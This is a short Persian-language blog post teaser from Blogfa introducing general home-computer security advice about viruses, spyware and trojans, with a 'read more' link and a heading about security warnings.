كامپيوتر شما، چه سه ساله باشد، چه سه روزه، با مشكلات امنيتي يكساني مواجه است كه گاهي بسيار خطرناك هستند. ويروس‌ها مي‌خواهند به محض آمدنتان به روي خط، وارد سيستمتان شوند. جاسوس‌افزارها بر پشت نامه‌ها سوار‌مي‌شوند و سعي مي‌كنند همراه با تبليغات وارد سيستم شما شوند. تروجان‌ها در كمين مي‌نشينند و با اولين غفلت، نفوذ‌مي‌كنند. راه‌هاي مختلفي براي مقابله با اين خطرات وجود دارد. در این ترفند سعي خواهيم‌كرد ضمن معرفي خطرات امنيتي، روش‌هاي مقابله با هر يك را توضيح دهيم. لازم به ذكر است كه اين نكات هيچ ترتيب خاصي ندارد و اولويت در مطرح كردن هر يك از آن‌ها، دليل مهم بودن آن برساير موضوعات نيست

هشدارهاي امنيتي را جدي نگيريد!


ادامه مطلب
+ نوشته شده توسط امیر در چهارشنبه یکم آبان 1387 و ساعت 3:21 |
Powered By
BLOGFA.COM

انجمنهای گفتگو - فهرست سایتهای ایرانی - سایت تفریحی وندا - آگهی و تبلیغات رایگان